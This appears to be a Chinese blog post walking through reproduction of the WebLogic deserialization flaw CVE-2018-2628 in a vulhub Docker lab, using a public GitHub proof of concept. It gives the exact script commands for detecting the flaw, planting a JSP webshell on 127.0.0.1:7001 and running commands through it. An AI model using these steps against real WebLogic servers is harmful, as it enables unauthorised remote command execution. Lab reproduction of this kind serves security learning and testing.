weblogic CVE-2018-2628 环境搭建和漏洞复现

使用漏洞环境为:vulhub 

这个POC使用,还是比较方便的

GitHub - jas502n/CVE-2018-2628: Weblogic 反序列化漏洞(CVE-2018-2628)Weblogic 反序列化漏洞(CVE-2018-2628). Contribute to jas502n/CVE-2018-2628 development by creating an account on GitHub.https://github.com/jas502n/CVE-2018-2628#use-method

攻击:kali

靶机:docker vulhub

注意每次使用的py脚本是不一样的的,我用红字标记了

漏洞发现

python CVE-2018-2628-poc.py   127.0.0.1 7001 wlscmd.jsp (这是自带的,不一定是他,但必须是6个字符,比如  abc123.jsp)

命令执行 

python CVE-2018-2628-Getshell.py  127.0.0.1 7001 wlscmd.jsp  (要有六个数字github已经自带了)

访问返回的链接,现在就可以执行命令,显示返回值为root

浏览器访问会失败,可以使用

curl -i URL

命令执行

这个是有限制的,不是很方便,现在需要拿到服务器权限,

复制Getshell.py 返回的链接

http://127.0.0.1:7001/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

去掉后面jsp后面的内容

第一步输入:python CVE-2018-2628.py

set shell :输入下面的链接即可

http://127.0.0.1:7001/bea_wls_internal/wlscmd.jsp

漏洞复现完毕,多注意这几个脚本区分使用就行,最后一个一开始没看到是需要去掉后面的base编码

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值